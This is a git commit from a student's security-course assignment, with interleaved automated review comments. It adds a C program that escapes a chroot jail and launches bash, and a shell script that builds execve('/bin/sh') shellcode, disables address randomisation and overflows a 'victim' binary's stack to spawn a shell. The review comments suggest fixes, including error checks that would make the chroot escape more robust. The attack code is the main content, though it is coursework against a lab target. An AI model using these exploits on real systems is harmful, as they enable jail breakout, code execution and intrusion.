author | Camil Staps | 2015-12-29 21:59:09 +0100 |
---|---|---|
committer | Camil Staps | 2015-12-29 21:59:09 +0100 |
commit | 29d4f26127ef8f3925df8437b41c89e3093d3508 (patch) | |
tree | b88d296e97e64dbbd4d66bd02214f3e7a6b55f41 | |
parent | Fixed typo (diff) |
Assignment 6
-rw-r--r-- | CamilStaps-s4498062-Assignment-6/ex1 | 5 | ||||
-rw-r--r-- | CamilStaps-s4498062-Assignment-6/ex1.c | 23 | ||||
-rw-r--r-- | CamilStaps-s4498062-Assignment-6/ex2 | 4 | ||||
-rwxr-xr-x | CamilStaps-s4498062-Assignment-6/ex2.sh | 15 |
4 files changed, 47 insertions, 0 deletions
diff --git a/CamilStaps-s4498062-Assignment-6/ex1 b/CamilStaps-s4498062-Assignment-6/ex1
new file mode 100644
index 0000000..7e92286
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-6/ex1
@@ -0,0 +1,5 @@
+a No: 'too many levels of symbolic links'
+b idem
+c See ex1.c
+d No, 'bash: /root/.bashrc: Permission denied'
+
diff --git a/CamilStaps-s4498062-Assignment-6/ex1.c b/CamilStaps-s4498062-Assignment-6/ex1.c
new file mode 100644
index 0000000..0ce1505
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-6/ex1.c
@@ -0,0 +1,23 @@
+#include <fcntl.h>
+#include <stdio.h>
+
+int main(void) {
+ int cwdf, x;
+
+ mkdir("crowbardir", 0755);
+
+ cwdf = open(".", O_RDONLY);
+
+ chroot("crowbardir");
+
+ fchdir(cwdf);
+ close(cwdf);
+
+ for (x=0; x<1024; x++)
+ chdir("..");
+
+ chroot(".");
+
+ system("/bin/bash");
+}
+
diff --git a/CamilStaps-s4498062-Assignment-6/ex2 b/CamilStaps-s4498062-Assignment-6/ex2
new file mode 100644
index 0000000..a542114
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-6/ex2
@@ -0,0 +1,4 @@
+a This did not work on lilo because execstack is not installed on lilo. It worked on my local machine.
+
+I spent so much time on getting this to work on lilo that I didn't have time for b and c.
+
diff --git a/CamilStaps-s4498062-Assignment-6/ex2.sh b/CamilStaps-s4498062-Assignment-6/ex2.sh
new file mode 100755
index 0000000..0a86bf5
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-6/ex2.sh
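Review bot: Every system call in `main` of ex1.c is used unchecked, and `mkdir`, `chroot`, `fchdir`, `chdir`, `close` and `system` have no prototypes in scope (`<fcntl.h>` and `<stdio.h>` are the only includes), so the file relies on implicit declarations, which C99 removed and current compilers reject. Add `#include <sys/stat.h>`, `#include <unistd.h>` and `#include <stdlib.h>`, and test each return value with `perror` and an early `return 1`; in particular both `chroot` calls fail with EPERM for an unprivileged process, and continuing silently then just launches a shell in the original directory, which makes the result look like the demonstration worked when it did not. A one-line header comment stating what the program is meant to show and its precondition (the process must hold the privilege to call `chroot`, so the same precondition is the defensive takeaway: a chroot does not confine a process that keeps that privilege) would make the file readable without the accompanying answer sheet.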
@@ -0,0 +1,15 @@
+echo 'int main() {\n asm("\\\nneedle0: jmp there\\n\\\nhere: pop %rdi\\n\\\n xor %rax, %rax\\n\\\n movb $0x3b, %al\\n\\\n xor %rsi, %rsi\\n\\\n xor %rdx, %rdx\\n\\\n syscall\\n\\\nthere: call here\\n\\\n.string \\"/bin/sh\\"\\n\\\nneedle1: .octa 0xdeadbeef\\n\\\n ");\n}' > shell.c
+gcc shell.c
+
+start=`objdump -d a.out | grep '<needle0>:' | cut -f 1 -d ' '`
+end=`objdump -d a.out | grep '<needle1>:' | cut -f 1 -d ' '`
+start=$((0x$start-0x400000))
+end=$((0x$end-0x400000))
+l=$((end-start))
+while [ ! $((l % 32)) -eq 0 ]; do l=$((l+1)); done
+xxd -s0x`printf %x $start` -l$l -p a.out shellcode
+
+a=$(echo "Camil" | setarch `arch` -R ./victim | head -n1)
+a=$(printf %016x $a | tac -rs..)
+( ( cat shellcode ; printf "%0464d" 0 ; echo $a ) | xxd -r -p ; cat ) | setarch `arch` -R ./victim
+
|
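Review bot: ex2.sh is committed with mode 100755 but has no shebang, so which shell interprets it is decided by whoever invokes it; add `#!/bin/sh` (or `#!/bin/bash` if bash-specific behaviour is intended) as the first line. Style: the script mixes backtick and `$(...)` command substitution (the `start=`, `end=`, `xxd` and `setarch` lines use backticks, the `a=` lines use `$(...)`), so use `$(...)` throughout. The loop `while [ ! $((l % 32)) -eq 0 ]` reads more directly as `while [ $((l % 32)) -ne 0 ]`, and `$start`, `$l` and `$a` should be double-quoted where they are expanded.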